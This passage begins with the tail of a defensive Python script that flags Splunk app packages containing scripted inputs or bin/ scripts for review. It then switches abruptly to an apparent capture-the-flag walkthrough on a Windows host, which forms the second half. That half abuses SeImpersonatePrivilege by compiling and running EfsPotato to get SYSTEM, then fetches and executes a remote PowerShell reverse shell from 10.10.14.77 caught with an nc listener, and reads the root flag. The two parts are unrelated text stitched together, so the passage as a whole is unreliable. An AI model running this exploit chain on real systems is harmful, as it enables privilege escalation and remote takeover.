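            if not member.isfile():
                continue
            parts = member.name.split("/")
            if len(parts) >= 3 and parts[-2] == "bin" and member.name.lower().endswith(SCRIPT_SUFFIXES):
                script_files.append(member.name)
            if parts[-1] == "inputs.conf" and parts[-2] in ("default", "local"):
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                cp = ConfigParser(interpolation=None, strict=False)
                cp.optionxform = str  # Splunk keys are case-sensitive
                cp.read_string(text)
                for section in cp.sections():
                    if section.startswith("script://"):
                        scripted_inputs.append((section, cp.get(section, "disabled", fallback="0")))
    return scripted_inputs, script_files


def needs_review(blob):
    """True when installing the package would run code under the splunkd identity."""
    scripted_inputs, script_files = inspect_spl(blob)
    return bool(scripted_inputs or script_files)


if __name__ == "__main__":
    package = build_spl(SAMPLE_FILES)
    inputs, scripts = inspect_spl(package)
    print("scripted inputs:", inputs)
    print("script files:", scripts)
    print("needs review:", needs_review(package))
```

A package with no scripted inputs and nothing under bin/ returns False from needs_review; anything else deserves a human look, and the mitigation the quoted guidance hints at is to run splunkd under a dedicated low-privilege service account rather than Local System so that an approved-but-malicious app does not land as SYSTEM.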
PS C:\Windows\system32> whoami /all
User Name SID
==================== ===========================================
haze\alexander.green S-1-5-21-323145914-28650650-2368316563-1106
Group Name Type SID Attributes
========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAZE\Splunk_Admins Group S-1-5-21-323145914-28650650-2368316563-1108 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeImpersonatePrivilege
SeImpersonatePrivilege is useful for privilege escalation -> https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seimpersonateprivilege
└─$ curl -LOs https://github.com/zcgonvh/EfsPotato/raw/master/EfsPotato.cs
PS C:\Windows\system32> cd ~/Music
PS C:\Users\alexander.green\Music> curl.exe 10.10.14.77/EfsPotato.cs -O
PS C:\Users\alexander.green\Music> ls C:\Windows\Microsoft.Net\Framework -rec -fil csc.exe | %{$_.FullName}
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
PS C:\Users\alexander.green\Music> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
PS C:\Users\alexander.green\Music> .\EfsPotato 'whoami'
nt authority\system
PS C:\Users\alexander.green\Music> .\EfsPotato 'powershell -c IEX(IWR 10.10.14.77/Invoke-ConPtyShell.ps1 -UseBasicParsing)'
nt authority\system
Shell
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
...
PS C:\Users\alexander.green\Music> whoami
nt authority\system
PS C:\Users\alexander.green\Music> cat /Users/Administrator/root.txt
27a454a7ca839375af60d82d4e1e520a